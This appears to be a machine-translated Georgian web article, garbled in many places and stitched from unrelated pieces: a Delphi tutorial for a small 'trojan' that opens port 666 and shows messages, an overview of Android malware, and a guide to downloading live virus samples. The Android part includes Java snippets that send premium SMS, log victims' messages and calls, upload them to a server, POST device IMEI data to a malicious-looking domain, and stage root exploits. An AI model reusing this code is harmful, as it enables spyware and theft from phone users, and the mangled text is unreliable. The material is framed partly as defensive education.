ვირუსული ინფექციები გასასვლელი კოდით. ვირუსის კოდები ვირუსის კოდებით შეიტყვეთ ვირუსის კოდი

ვინაიდან გაგიკვირდებათ, როგორ იწერება “პროგრამის სერვერი - კლიენტი” და როგორ მუშაობს ის რეალურ აპლიკაციაზე, გირჩევთ პოსტის ბოლომდე წაკითხვას. მშვენიერი იქნება!

მაგრამ პროგრამა მინდა დავწერო Delphi-ში! ასე რომ, ეს უფრო მარტივია და უკეთ შეეფერება პატარა, მაგრამ რეალურ უკანალს. რატომ მენატრება ბინძური სიტყვა "" თითქოს რაღაც გამოვიცანი, მაშინ აქ, ეფექტურად გამოდის, არის ნამდვილი ტროას, მცირე ან საერთოდ არ აქვს სასარგებლო ფუნქციონირება.

იცი რა პრინციპი წერია უკან? "და რა სუნი დგას შუაში!" Ale, უბრალოდ "ALE" Trojans არ უნდა დაიწეროს, როგორც ქვემოთ იქნება აღწერილი. ნამსხვრევები ჩვენს კონდახში, " სერვერი»პარტინას პროგრამა უხვად მნიშვნელოვანი იქნება ( ეს არ არის სასიამოვნო ნამდვილი ტროიანისთვის), და ჩვენ არ მიგვიღებენ სისტემაში. ნამდვილი, "ერთჯერადი PZ" ცოტა განსხვავებულად წავა.

პროგრამის სერვერის ნაწილი შექმნილია მცირე ზომის შესამუშავებლად, კარგად, დაახლოებით "100 KB" პლუს ან მინუს რამდენი KB. და შეიტანეთ იგი სისტემაში, ისე, რომ მას დიდხანს მოუწევს ხუმრობა! ...

სულ ერთია, ზრდის პრინციპი იგივეა! და ეს მაგალითი იდეალურია იმის გასაგებად, თუ როგორ ვმუშაობ პროგრამებთან, რომელიც დაფუძნებულია "სერვერი - კლიენტი" პრინციპზე. ჩვენ უბრალოდ არ გვაქვს სწორი ტონი ტროას გაკვეთისთვის, მაგრამ რა გვჭირდება? უფლება. არა!!! ჩვენ კარგი ბიჭები ვართ და არ ვაპირებთ დაშინებას!

როგორ გავუშვათ პროგრამები "სერვერი - კლიენტი" პრინციპზე

უბრალოდ, და მოკლედ, სურათი ასე გამოიყურება: თქვენს კომპიუტერში თქვენ გაუშვით " კლიენტის„პროგრამის ნაწილს, როგორც წესი, აქვს კლიენტის ინტერფეისის მსგავსი „GUI“ (რადგან კლიენტი არ არის კონსოლური)

კომპიუტერზე, სანამ წვდომის გაუქმება გსურთ, ” სერვერი”პროგრამის ნაწილი, ის ხსნის იმავე პორტს სხვის კომპიუტერზე და არ ჩანს სისტემაში.

კავშირი ხდება ამ პორტის საშუალებით. კლიენტში თქვენ მიუთითებთ კომპიუტერის პორტსა და IP მისამართს, რომელზედაც მუშაობს სერვერი, უკავშირდებით სერვერს და შეგიძლიათ უსაფრთხოდ ჩამოტვირთოთ ნებისმიერი ქმედება სხვის კომპიუტერზე თქვენივე კომპიუტერიდან! თქვენ ასევე შეგიძლიათ წაიკითხოთ ჩემი ბოლო პოსტი და გაიგოთ:

დარწმუნებული ვარ, რომ ეს აქ ავხსენი, რატომღაც მივხვდი ჩემს უბრალო ადამიანურ ბუნებას! თუ ეს არ არის ნათელი, მაშინ, პრაქტიკაში, ყველაფერი ნათელი გახდება! შემდეგი, მოდით გავარკვიოთ, რა სახის საქმეებს გავაკეთებ დისტანციურ კომპიუტერზე, როგორც ჩვენი პატარა ტროას მუშაობის მემკვიდრე!

რა ფუნქციონალურია სერვერი - კლიენტის პროგრამის ამ აპლიკაციაში.

მართალი გითხრათ, რომელ ეტაპზე, თუ გავზომე, რომ მეჩვენებინა, რომ თითქოს მთვრალი ვიყავი და ვერ ვხვდებოდი, რისი ბრალია! ვთქვათ, რომ ფუნქციონირება იქნება რაც შეიძლება მარტივი და შიშივით მარტივი:

- კორისტუვაჩი მიიღებს თქვენს ინფორმაციას.

არ მინდა აზრს სხვა შესაძლებლობები დავამატო. ასე რომ, მე პატივს ვცემ, რომ ეს სრულიად საკმარისია პრაქტიკული მიზნებისთვის და გაგებისთვის. ასე რომ, მე ვფიქრობ, რომ ბევრი კოდის დაწერა არ არის კარგი, მაშინ რა არის უფრო დაბალი, მაშინ დროა გაოცდეთ პროგრამის შუაგულში!

და იმავდროულად, შეიძლება ყველაფერი წესრიგშია, იმ ადამიანების წარმოსახვაში, რომლებსაც სურთ დაწერონ ტროას და, შესაბამისად, იცოდნენ ეს პროგრამაში.

აბა, ასეთი ხუმრობა გვექნება! კომპიუტერთან მჯდომი ადამიანი უხალისოდ უარყოფს ინფორმაციას, მაგალითად

« გამარჯობა, მე ვზივარ თქვენს კომპიუტერზე»

შეგიძლიათ დაადგინოთ ხალხის რეაქცია? ვფიქრობ სასაცილოა, ვისურვებდი, რომ ეს უკეთესად გამეკეთებინა!!!

პროგრამების შემუშავება "სერვერი - კლიენტი" პრინციპით

მოდი დავიწყოთ, სანამ საბოლოოდ არ დასრულდება! მე მესმის განვითარების " სერვერებიამის შემდეგ ჩვენ ახალ კლიენტს დავწერთ! არ განვმარტავ პროგრამის კოდს, უბრალოდ აღვნიშნავ, ბოლოს და ბოლოს, მე არ მაქვს ბლოგი პროგრამირების შესახებ, ეს მეტა პოსტი ეტაპობრივად აჩვენებს მსგავსი პროგრამების შემუშავების პროცესს „სერვერ - კლიენტი“ " პლატფორმა.

სერვერის გაფუჭება!

პირველ რიგში, თქვენ უნდა ასწავლოთ "სერვერს" კომპიუტერზე გარკვეული პორტის გახსნა, რათა შემდეგ შეძლოთ სხვა "კლიენტთან" დაკავშირება და შემდეგ ისწავლოთ როგორ მიიღოთ ბრძანებები და შეინახოთ ნებისმიერი ფაილი კომპიუტერში.

პორტი იხსნება კოდის გამოყენებით, რომელიც მტკივნეულად მარტივია:

დელფი/პასკალი

პროცედურა TForm1.FormCreate(გამომგზავნი: TObject); დაწყება ServerSocket1.Port: = 666; ServerSocket1.Active: = true; დასასრული;

პროცედურა TForm1. FormCreate(გამომგზავნი: TObject);

დაიწყება

ServerSocket1. პორტი: = 666;

ServerSocket1. აქტიური: = true;

დასასრული;

ახლა, როდესაც თქვენ გაუშვით პროგრამა, ის უბრალოდ გამოჩნდება ცარიელი, ყოველგვარი ღილაკების ან სხვა ელემენტების გარეშე. და რაც მთავარია, კომპიუტერზე იქნება ღია პორტი ნომრით “666.” ჩვენ სერვერს ვუგზავნით ბრძანებებს ამ პორტზე და შემდეგ დავამუშავებთ მათ.

ამასობაში ვნახოთ რა მუშაობს სერვერი და პორტი ღიაა, გამოვიცნოთ “netstat” ბრძანება და მივიღოთ გასაკვირი შედეგი.

როგორც კომპიუტერზე, ჩვენი პროგრამის გაშვების შემდეგ, იქნება ღია პორტი ნომრით "666." ყველაფერი ნათქვამია, რომ პროგრამა მუშაობს და დროა ვისწავლოთ " სერვერი»გთხოვთ მიიღოთ ეს ინფორმაცია.

დელფი/პასკალი

პროცედურა TForm1.ServerSocket1ClientRead (გამომგზავნი: TObject; სოკეტი: TCustomWinSocket); var comm: string; დასაწყისი com: = socket.ReceiveText; თუ კოპირება (komm, 1,12) = "MESSAGE_TEXT" მაშინ დაიწყეთ წაშლა (komm, 1, 12); ShowMessage(comm); დასასრული; დასასრული;

პროცედურა TForm1. ServerSocket1ClientRead(გამომგზავნი: TObject;

სოკეტი: TCustomWinSocket);

com: string;

დაწყება

com: = სოკეტი. ReceiveText;

თუ კოპირება (komm, 1, 12) = "MESSAGE_TEXT" მაშინ

დაიწყება

წაშლა (komm, 1, 12);

ShowMessage(comm);

დასასრული;

დასასრული;

აი, განაგრძეთ თანმიმდევრობით! სერვერი მიიღებს ბრძანებას სახელწოდებით "MESSAGE_TEXT" ( სახელი შეიძლება იყოს რაც არ უნდა იყოს) შემდეგ შესრულებულია "ShowMessage" პროცედურა და აჩვენებს შეტყობინებას, რომელიც მოვიდა ბრძანებასთან და ინახება სტრიქონის ცვლადში "komm"

ცხადია, შეტყობინების ტექსტი აკრეფილი იქნება " კლიენტებს”და შეიძლება იყოს რაიმე სახის შურისძიება!”

სხვა სიტყვებით რომ ვთქვათ, რომელ განვითარებაზე " სერვერი» ნაწილები დასრულებულია. შედეგად, ჩვენ გვაქვს უნიკალური ფაილი " Server.exe"და ახლა, მოდით, განზე გადავდოთ, სანამ არ დავწერთ" კლიენტი»

კლიენტის გაცნობა!

კლიენტი, კარგი მიზეზის გამო, გამოიყენებს მომხმარებლის გრაფიკულ ინტერფეისს (GUI) და პასუხისმგებელია კონტროლებზე, ღილაკებზე და შეყვანის ველებზე. ჩემი ღერძი ასე გამოიყურება:

მნიშვნელოვანია ყველა ელემენტით! თუ მსურს ვიყო ისეთი გონივრული, როგორც ჩანს, ავხსნი ყველა შემთხვევას.

IP: ველები IP კომპიუტერში შესასვლელად, სერვერის გაშვებისთვის.
პორტი: მიუთითეთ პორტის ნომერი, რომელ სერვერზე უნდა დაკიდოთ.
- შეაერთე: ღილაკი სერვერთან დასაკავშირებლად.
- განცხადების ტექსტი: ველი ინფორმაციის შეყვანისთვის, რომელიც უნდა გაიგზავნოს.
- შეტყობინების გაგზავნა...: ეს არის შეტყობინების გაგზავნის ღილაკი.
- კავშირის სტატუსი: აქ გავარკვევთ ვინმეს თუ დაუკავშირდა!

დელფი/პასკალი

პროცედურა TForm1.Button1Click(გამომგზავნი: TObject); start ClientSocket.Host:= IP.Text; ClientSocket.Port: = StrToInt(Port.Text); ClientSocket.Open; დასასრული;

პროცედურა TForm1. Button1Click(გამომგზავნი: TObject);

დაიწყება

ClientSocket. მასპინძელი: = IP. ტექსტი;

ClientSocket. პორტი: = StrToInt(Port.Text);

ClientSocket. გახსნა;

დასასრული;

შეგიძლიათ დაუყოვნებლივ გაუშვათ პროგრამა და სცადოთ დაკავშირება " სერვერები„მიუხედავად იმისა, რომ ჩვენ არ ვიცით შედეგი, არავინ დაკავშირებულა. შემოწმებამდე შეგვიძლია ამის გამოსწორება და პროგრამა დაიწყებს კავშირის შედეგის ჩვენებას.

დელფი/პასკალი

პროცედურა TForm1.ClientSocketConnect (გამომგზავნი: TObject; სოკეტი: TCustomWinSocket); start Label4.Caption: = ("დაკავშირება ვერ მოხერხდა:" + IP.Text); Label4.Font.Color:=clGreen; დასასრული;

და ეს იმიტომ ხდება, რომ ყველას არ შეეძლო სერვერთან დაკავშირება, მაგალითად იმიტომ, რომ ” სერვერი"დისტანციური კომპიუტერი არ მუშაობს და პორტი "666" დახურულია.

დელფი/პასკალი

პროცედურა TForm1.ClientSocketError (გამომგზავნი: TObject; სოკეტი: TCustomWinSocket; ErrorEvent: TErrorEvent; var ErrorCode: Integer); დაიწყეთ, თუ ErrorCode = 10061, შემდეგ დაიწყეთ ClientSocket.Active: = False; Label4.Font.Color:=clRed; Label4.Caption: = ("კავშირები ვერ მოხერხდა:" + IP.Text); შეცდომის კოდი: = 0; დასასრული; დასასრული;

პროცედურა TForm1. ClientSocketError(გამომგზავნი: TObject; სოკეტი: TCustomWinSocket;

ErrorEvent: TErrorEvent; var ErrorCode: Integer);

დაიწყება

თუ ErrorCode = 10061 მაშინ

დაიწყება

ClientSocket. აქტიური: = მცდარი;

ლეიბლი 4. შრიფტი. ფერი:=clRed;

ლეიბლი 4. წარწერა: = ( "კავშირები ვერ მოხერხდა:"+ IP. ტექსტი);

შეცდომის კოდი: = 0;

დასასრული;

დასასრული;

ახლა მაინტერესებს როგორ მუშაობს პროგრამა. დასაწყისისთვის, ჩვენ ვიწყებთ კლიენტს, მაგრამ არ ვიწყებთ სერვერს, რათა შევამოწმოთ, რომ შეტყობინებები გამოჩნდება მათ შესახებ, ვინც დაკავშირებულია.

Android-ის უფასო დანამატების კოლექციას სხვადასხვა ანტივირუსული ლაბორატორიებიდან უკვე 10 მილიონზე მეტი ჰიტი აქვს. ეს მაჩვენებელი ნათელია, მაგრამ მათგან დაახლოებით 9 მილიონ 995 ათასს ეწოდა ორიგინალური ვირუსების ასლები. თუ თქვენ გააანალიზებთ გამომავალ კოდს და დაკარგეთ ათიათასობით მავნე პროგრამის გამონათქვამი, შეგიძლიათ გაითვალისწინოთ, რომ ყველა მათგანი გაერთიანებულია უნიკალური ფუნქციური ბლოკების მცირე რაოდენობასთან (ვარიაციების რაოდენობა და სხვაგვარად კომბინირებული).

ყველაფერი მარჯვნივ არის ის, რომ გეიმმეიკერები ყველაზე ხშირად ასრულებენ ტრივიალურ დავალებებს:

  • გაგზავნეთ შეტყობინება ფასიან ნომერზე;
  • მომხმარებლის კონფიდენციალური ინფორმაციის აღება (ტელეფონის ნომრები, შეტყობინების ტექსტები, მონაცემები SD ბარათიდან და ა.შ.);
  • შეაგროვოს მონაცემები ინფიცირებული მოწყობილობის შესახებ;
  • მიიღეთ ადმინისტრაციული უფლებები მოწყობილობაზე (დამატებების დაყენება ავტორიტეტის ნებართვის გარეშე ან მოწყობილობის მავნე გამორთვა);
  • შეიყვანეთ შესვლა, პაროლები და გადახდის ბარათის მონაცემები, რომლებიც შეიტანეთ ინტერნეტ ბანკინგის სისტემების ვებსაიტებზე. როგორ შეგიძლიათ შეაჩეროთ სურნელი? მოდით, შევეცადოთ შეაღწიოთ მობილური თამაშების ბუნდოვან სამყაროში და გავაკვირვოთ რა არის იქ.

SMS გაგზავნა

ვინ არის ვიკორისტი:

  • AdSms;
  • FakePlayer;
  • HippoSms.

ვირუსის ყველაზე გავრცელებული ტიპია SMS Trojans. ეს ვირუსები უბრალოდ აგზავნიან შეტყობინებებს ფასიან ნომრებზე მომხმარებლის საჭიროების გარეშე. საკმაოდ მარტივია ასეთი პროგრამის შექმნა ან მზა პროგრამის გადაწერა საჭირო ნომრით. საზღვრის პატიების სარგებლის მოპოვების ეს პროცესი - ადმინისტრაციისთვის, მაგალითად, საბანკო მონაცემების განახლების პროცესში.

ქვემოთ მოცემულია კოდის უმარტივესი მაგალითი. SMS-ის გაგზავნის აუცილებელი ფუნქცია. ეს შეიძლება გართულდეს გაგზავნის სტატუსის შემოწმებით, აბონენტის ადგილმდებარეობის მდებარეობის ნომრების არჩევით და შემდგომი SMS გაგზავნით.

პირადი სტატიკური SendSms (String DestNumber, String SmsText) (// სცადეთ SmsManager ობიექტის sendTextMessage მეთოდის გაშვება (სტანდარტული პროგრამა სტრიმინგ მოწყობილობაზე SMS-ის გაგზავნისთვის) პარამეტრების მინიმალური რაოდენობით: მფლობელის ნომერი და შეტყობინების ტექსტი სცადეთ ( SmsManager.getDef ault().SendTextMessage (DestNumber, null, SmsText, null, null); დაბრუნება true;))

უთხარი ვირუსის კოდი

შემთხვევების აბსოლუტურ უმრავლესობაში, ტელეფონი ინფიცირდება დანამატების დაყენებით. ანდროიდის ნებისმიერი დანამატი შეიძლება ნახოთ ფაილში გაფართოებული apk-ით, რომელიც, არსებითად, არის არქივი. ამის ნაცვლად შეგიძლიათ ნახოთ Android SDK-ის, APK-ში JAR ფაილების გადამყვანი და Java bytecode decompiler-ის გამოყენებით. დანამატის ნაკრები (APK) შედგება შემდეგი ნაწილებისგან:

  • რესურსები.arsc - რესურსების ცხრილი;
  • res (საქაღალდე) - თქვენი რესურსები (ხატები და სხვა);
  • META-INF (საქაღალდე) - განათავსეთ ფაილები მიმდინარე მდებარეობით: რესურსების კონტროლი, პროგრამის სერთიფიკატი და APK build-ის აღწერა;
  • AndroidManifest.xml - ყველა სახის სერვისის ინფორმაცია. გარდა ამისა, მოცემულია ნებართვა, რომ დანამატი საჭიროა ინსტალაციამდე მისი სწორი მუშაობისთვის;
  • classes.dex - შეგიძლიათ იგრძნოთ, რომ Android ოპერაციულ სისტემებში, ყველა კოდი შედგენილია Dalvik ვირტუალური აპარატის გამოყენებით (დაწყებული ვერსიით 4.4, ჩნდება ART მხარდაჭერა), რომელსაც არ ესმის ორიგინალური Java ბაიტიკოდი. ამიტომ, თქვენ უნდა შექმნათ ფაილები dex გაფართოებებით. გარდა ამისა, არსებობს მთელი რიგი აუცილებელი და სასარგებლო კლასები (რომლებიც მიუთითებს დანამატის ფუნქციონირებაზე), ასევე არის საშიში (ვირუსის კოდი, რომელსაც განვიხილავთ ამ სტატიაში).

მომხმარებლის ინფორმაციის ჩაწერა ტექსტურ ფაილში

ვინ არის ვიკორისტი:

  • NickySpy;
  • SmsSpy.

ეს არის ვირუსების მთავარი კატეგორია, რომელიც მიზნად ისახავს კლიენტების პერსონალურ მონაცემებს. მათი მოქმედების მექანიზმიც უხერხულია. ან ატვირთეთ თქვენი შემქმნელის ფაილები სერვერზე, ან ჯერ შეაგროვეთ ნებისმიერი მონაცემი txt-ში (CSV, XML - რაც არ უნდა იყოს). კრიმინალებისთვის საინტერესო შეიძლება იყოს ნებისმიერი ტიპის კონტაქტები, ინფორმაცია სხვადასხვა მყისიერი მესინჯერიდან, მედია ფაილები და ა.შ.

ინფიცირებული კორესპონდენტების SMS შეტყობინებები განსაკუთრებით ღირებულია მათი მენეჯერებისა და მფლობელების ტელეფონის ნომრებით - მათი გამოყენება შესაძლებელია სპამის საწვავის ბაზის გასაფართოებლად. უფრო ხშირად, ვიდრე არა, ამ ტიპის ვირუსები გამოიყენება კონკრეტული ფუნქციების მოწყობილობების დასაინფიცირებლად - შემდეგ ჯერზე, თუ თქვენი შეყვარებული მოგთხოვთ გააპროტესტოთ ის, რაც დაწერა (აჰ, კარამბა! - რედ.) დამატება Android-ზე, ნუ დაკარგე დრო :).

// მოწყობილობაზე SMS შეტყობინებების რაოდენობა მნიშვნელოვანია arrayOfObject = (Object) localBundle.get ("pdus"); int j = arrayOfObject.length; // ჩაწერეთ თითოეული SMS i = 1 ხოლო (true) (თუ (i> = j) შესვენება; // შექმენით SMS შეტყობინების ობიექტი SmsMessage localSmsMessage = SmsMessage.createFrompdu ((ბაიტი) arrayOfObject [i]); / / მოათავსეთ მწკრივი გამომგზავნის ნომერი, ტექსტი და SMS გაგზავნის საათი. = new SimpleDateFormat ("yyyy-MM-dd HH: mm: ss"). ფორმატი (localDate); // ჩვენ შეგვიძლია შევქმნათ მწკრივი ამ მონაცემებიდან და ჩავწეროთ ტექსტურ ფაილში WriteRec მეთოდის გამოყენებით String MessageInfo = 7MessageNumber + " #" + MessageText + "#" + MessageTimeDate + ";" WriteRec (paramContext, "sms.txt", MessageInfo); // გადადით მომავალ შეტყობინებაზე i + = 1;) ასევე შეგიძლიათ ხელით მიიღოთ სპამის სიიდან აბონენტის დაწკაპუნების ისტორია. შემდეგი კოდის გაშვება შესაძლებელია, როდესაც ლოგინი რეკავს: If (parmIntent.getAction (). უდრის ( "android.intent.action.NEW_OUTGOING_CALL")) (// ჩასვით აბონენტის ნომერი String phonenumber = paramIntent.getStringExtra ( "android. intent. extra.PHONE_NUMBER "); // ჩვენ ვქმნით ნომრების სერიას და ზარის თარიღებს String PhoneCallRecord = ტელეფონის ნომერი +" # "+ getSystemTime (); // ჩვენ ვუწოდებთ WriteRec () მეთოდს (აქ არ შეიყვანოთ კოდი), რომელიც ამატებს სერიებს ტექსტურ ფაილში ზარის ისტორია WriteRec (paramContext, "phonecall.txt", PhoneCallRecord);

ინფორმაციის ჩაწერის შემდეგ, ის გადაეგზავნება "საჭირო ხელებს". ქვემოთ მოცემულ კოდზე დაწკაპუნებით გამოჩნდება სერვერზე ზარების ისტორია:

Private void uploadPhonecallHistory () აგდებს IDException (ხოლო (true) (დაბრუნება; // შეამოწმეთ რომელი ფაილი გვჭირდება, თუ (! FileIsExists (/data/data/spyapp.pg/files/phonecall.txt")) გაგრძელდება; // შექმნა ობიექტი - ფაილების ატვირთვა UploadFiles localUploadFiles = ახალი UploadFiles (); String uploadkeynode = getKeyNode ( "uid", "uid_v"); // გაშვება მეთოდი.advanceduploadfile (აქ არ შეიყვანეთ კოდი) ფაილის ატვირთვისთვის "ვირუსის შემქმნელში" " სერვერი localUploadFiles.advanceduploadfile (uploadkeynode, "/data/data/spyapp.pg/files/phonecall.txt");))

ინფორმაციის შეგროვება

ვინ არის ვიკორისტი:

  • DroidKungFu;
  • DroidDream;
  • მთავარია ყველა მსგავსი მავნე პროგრამის დიდი რაოდენობა.

პრინციპში, ნებისმიერი ვირუსის შემქმნელი ისარგებლებს იმით, რომ მისი მოწყობილობები ინფიცირებულია პროგრამებით. მისგან თავის დაღწევა მართლაც ადვილია. იქმნება მონაცემთა მასივი ტელეფონის სიმძლავრის შესახებ (მათი სრული სია შეგიძლიათ იხილოთ Android დისტრიბუციის მონაცემთა ბაზაში) და POST-ით იგზავნება PHP სკრიპტზე (არაპრინციპულად) მავნე სერვერზე, რომელიც ამუშავებს მონაცემებს და ათავსებს მას მონაცემთა ბაზა შემდგომი ვიკორისტანისთვის.

Private void reportState (int paramInt, string paramString) (// შექმენით მასივი და ჩადეთ იგი სერვისის ახალ ინფორმაციაში ArrayList UserInformation = new ArrayList (); UserInformation.add (new BasicNameValuePair ( "imei", this.mImei)); UserInformation .add ( ახალი BasicNameValuePair ("taskid", this.mTaskId)); UserInformation.add (ახალი BasicNameValuePair ("state", Integer.toString (paramInt))); // თუ ფუნქციას აქვს პარამეტრი "paramString (კომენტარი)" , ჩასვით მასივში і yogo if (paramStrng !=null) && (! "". უდრის(paramString))) UserInformation.add(new BasicNameValuePair("კომენტარი", paramString)); // HTTP POST-ის შექმნა იმ სკრიპტის მისამართით, რომელიც აგროვებს მონაცემებს HttpPost localHttpPost = new HttpPost ("http://search.virusxxxdomain.com:8511/search/rtpy.php"); სცადეთ (// დაამატეთ ჩვენი მასივი მონაცემებით და დაამატეთ ის სტანდარტულ HTTP კლიენტს localHttpPost.setEntity (ახალი UrlEncodeFormEntity (UserInformation, "UTF-8"))); ახალი DefaultHttpClient(). execute(localHttpPost).getStatusLine.getStatusCode(); დაბრუნების; ))

რუტინგი

ვინ არის ვიკორისტი:

  • DroidKungFu;
  • DroidDream;
  • RootSmart.

ერთ-ერთი ყველაზე ცუდი რამ, რაც შეიძლება დაემართოს Android მოწყობილობას, არის ვირუსის დაშლა. ამ ცუდი პროგრამის შემდეგაც კი, ნებისმიერ დროს შეგიძლიათ მასთან მუშაობა: დააინსტალირეთ სხვა ვირუსები, შეცვალეთ აპარატურის პარამეტრები. მოქმედება ეფუძნება ექსპლოიტების თანმიმდევრულ გაშვებას:

Private void RootFunc () (ApplicationInfo localApplicationInfo = getApplicationInfo (); / * "ratc" არის Rage Against The Cage-ის ცნობილი ძირეული ექსპლოიტის ასლი. Kiall არის ზუსტი დანართით დაწყებული ყველა პროცესის ბირთვი. Gjsvro არის ექსპლოიტი. udev-ის ნებართვების მოპოვება (გამარჯვება Linux სისტემებში ტექნიკითა და კიდეების ინტერფეისებით გაფართოებული მუშაობისთვის). ყველაფერი დაკოპირებულია სწორ ადგილას * / Utils.copyAssets (ეს, "ratc", "/data/data" + localApplicationInfo.packageName + "/ ratc"); Utils .copyAssets(this, "killall", "/data/data" + localApplicationInfo.packageName + "/killall");Utils.copyAssets(ეს, "gjsvro", "/data/data" + localApplicationInfo. packageName + "/gjsvro "); // მე გავრბივარ დამატებითი ბრძანების ხაზის გამოყენებით Utils.oldrun (" / system / bin / chmod "," 4755 /data/data" +localApplicationInfo.packageName + "/ ratc"); Utils. oldrun ("/system/ bin/chmod","4755/data/data"+localApplicationInfo.packageName+"/killall");Utils.oldrun("/system/bin/chmod", "4755/data/data"+localApplicationInfo .packag eName+" /gjsvro"); ახალი MyTread.start(); )

ვებსაიტები მობილური მავნე პროგრამების შესახებ

კასპერსკის ლაბორატორიის ექსპერტების ბლოგი ეს რესურსი შეიცავს ნათელ და ინფორმაციულ სტატიებს კომპიუტერული უსაფრთხოების მრავალი ასპექტის შესახებ, მათ შორის Android ვირუსების შესახებ. გთხოვთ ეწვიოთ ამ საიტს რეგულარულად, რათა იყოთ უახლესი ამბების შესახებ.

ჯგუფი ეძღვნება ღია კოდის ინსტრუმენტს ყველა სახის მანიპულაციისთვის ანდროიდის დანამატების კოდით (DEX / ODEX / APK ფაილების დეკომპილაცია და მოდიფიკაცია და ა.შ.). Androguard-ს ასევე აქვს ვირუსების შესახებ სტატიების დიდი მონაცემთა ბაზა. ფუნქციონალურობისა და დაცვის მეთოდების მოკლე მიმოხილვის გარდა, ფოკუსირებულია მავნე პროგრამის კოდის ანალიზის ანგარიშები.


მობილური საფრთხეების განყოფილება www.fortiguard.com სატელეფონო ვირუსების ენციკლოპედია. კანის მდგომარეობა - ფუნქციონალურობის შეხედვა, ტექნიკური დეტალების მნიშვნელოვანი რაოდენობა. Android ოპერაციული სისტემის საფრთხეების შესახებ ინფორმაციის გარდა, არსებობს სტატისტიკა და ვირუსების შესახებ Symbian OS, iOS და სხვა პლატფორმებისთვის.


Ვირუსისგან დაცვა

ბიზნესის მფლობელებს მიაჩნიათ, რომ თუ ჩამოტვირთავთ დანამატებს Google Play-დან და დააინსტალირებთ ანტივირუსს თქვენს სმარტფონზე, ეს უზრუნველყოფს უსაფრთხოების გარანტიას. არ ინერვიულოთ: Merezhi რეგულარულად გვაწვდის ინფორმაციას მავნე პროგრამის არსებობის შესახებ ოფიციალურ ბაზარზე. და ახალი, მავნე პროგრამების რაოდენობა თვეში ასობით ათასია, რაც მათ ანტივირუსული პროგრამების მონაცემთა ბაზებში დაკარგვის ალბათობას ზრდის. უსაფრთხოების რეალური გარანტია შეგიძლიათ მიიღოთ APK ფაილის კოდის გადახედვით თქვენს ტელეფონზე დაყენებამდე. ცუდი ბიტების მონიშვნას კოდირების გურუ არ სჭირდება. და ჩვენი სტატია დაგეხმარებათ ამაში.

ვისნოვოკი

როგორც აპლიკაციების შემთხვევაში, მობილური პროგრამული უზრუნველყოფა არ განიცდის ტექნოლოგიურ დასაკეცობას. რა თქმა უნდა, ეს აპლიკაციები გამარტივებულია ჟურნალის ფორმატისთვის - უპირველეს ყოვლისა, სემპლერებისა და გამორთვის საშუალებების გამოყენება, ასევე სხვა ტექნიკური დეტალები, რომელთა არსებობა არ გაიძულებთ გაიგოთ Android მავნე პროგრამის პრინციპები. , და იმის უზრუნველსაყოფად, რომ არ არის დანაკარგი სხვა ექსპერიმენტები. ჩვენ არც კი ვუჭერთ მხარს ვირუსების შექმნას, ასეა? 🙂

საიდან გადმოვწერო ვირუსის კოდები გამომავალი კოდით და ანგარიშის აღწერილობით?

მიმდინარე ვირუსების კოლექციის პოვნა და მით უმეტეს აღწერებითა და კოდებით, ადვილი საქმე არ არის. ამის შესახებ უკვე გვაცნობეს ანალიზისა და მკურნალობისთვის. დღეს მე გეტყვით კიდევ ერთ მოწყობილობაზე, რომელზედაც შეგიძლიათ იპოვოთ და ჩამოტვირთოთ, მაგრამ ამჯერად შუაში არ არის მხოლოდ მავნე პროგრამა, არამედ მიმდინარე ფაილები და ვირუსის წყაროები საანგარიშო ინფორმაციით.

ამ სტატიაში თქვენ გაეცნობით რამდენიმე სასარგებლო პროექტს, რომლებიც ცდილობენ შეაღწიონ ყველა ტროას, ბოტნეტის, სტილერის, ჭიის და ა.შ. გამომავალი კოდის შუქზე.

  • პერედმოვა
  • ვირუსების შაბათ-კვირის ტექსტები
  • ზოოპარკის პროექტი
  • მავნე პროგრამის პროექტი

ახალი ამბები და ვის შეიძლება დასჭირდეს ვირუსული ინფექციები?

შემავალი ფაილები და გამომავალი ვირუსები შეიძლება საჭირო გახდეს ვიკორიზებული პროგრამული უზრუნველყოფის ტექნოლოგიების გასაანალიზებლად, სისტემაში ვირუსების ქცევის მონიტორინგისთვის (ფაილის სისტემის მონიტორინგი, პროცესები) და ანტივირუსების შესამოწმებლად. ანტივირუსული კომპანიების spyware სპეციალისტები მზად არიან გადაიხადონ პენი ახალი ვირუსის სათესლე კოდების მოსაპოვებლად.

ლეგალურია ვირუსების შეძენა?

თქვენ შეგიძლიათ დაიჭიროთ ვირუსული ინფექციები თქვენს კომპიუტერში ინფექციისა და ანალიზისთვის, მაგრამ არ შეგიძლიათ მათი გავრცელება და სხვების დაინფიცირება. ამის შესახებ მეტი ინფორმაცია რუსეთის ფედერაციის კოდექსის 273-ე წესდებაშია.

ამ პროექტების მეტა - თარიღები ანტივირუსული კომპანიებისთვის და ადამიანებისთვის, რომლებიც აანალიზებენ ვირუსებს, იყენებენ მოწყობილობას მავნე მავნე კოდისთვის.

პატივისცემა! გთხოვთ გაითვალისწინოთ, რომ გადმოწერილი ფაილები შეიცავს სამუშაო ვირუსებს. ზოგიერთი მათგანი შეძლებს თქვენი კომპიუტერის დაინფიცირებას. არასოდეს გაუშვათ გადმოწერილი ფაილები თქვენს მთავარ კომპიუტერზე. ასევე არ გირჩევთ ვირუსების შეძენას უსარგებლო პროგრამების ანალიზის სპეციალური ცოდნის გარეშე.

ნებისმიერ შემთხვევაში, ვებსაიტი www.site არ ეკისრება პასუხისმგებლობას თქვენს საკუთარ ან სხვა ადამიანების კომპიუტერებზე მიყენებულ ზიანს.

კატეგორიულად გირჩევთ vikoristovvat. არ დაივიწყოთ საზიზღარი ჭიები, რომლებიც გავრცელდებიან და გაურბიან ვირტუალურ მანქანას. იმისათვის, რომ ეს უნიკალური იყოს, მსურს ყველა სტუმრის დამატება ვირტუალურ მანქანებზე, შეზღუდული წვდომის და ა.შ. როგორ მიიღოთ ის, შეგიძლიათ გაიგოთ გაგზავნილი მესიჯიდან.

ვირუსების ყოველკვირეული ტექსტები: TheZoo Project

მოდით გადავხედოთ პროექტს Zoo, რომელიც აღწერილია, როგორც ზოოპარკი (ავტორების იუმორი კარგია). შეამოწმეთ იგი Githab-ის საცავში.

პროექტი მიზნად ისახავს ვირუსული ინფექციის ხელმისაწვდომობას. ავტორები აგროვებენ და განაახლებენ ვირუსების მონაცემთა ბაზას. TheZoo-ს დახმარებით თქვენ შეგიძლიათ უარი თქვათ უფასო PZ-ის პოპულარულ სურათებზე წვდომაზე.

ვირუსები: theZoo Project

ჩამოტვირთვისა და გადმოტვირთვისთვის ნაჩვენებია როგორც გადმოწერილი, ასევე გამომავალი ფაილი.

როგორ სარგებლობთ ზოოპარკიდან?

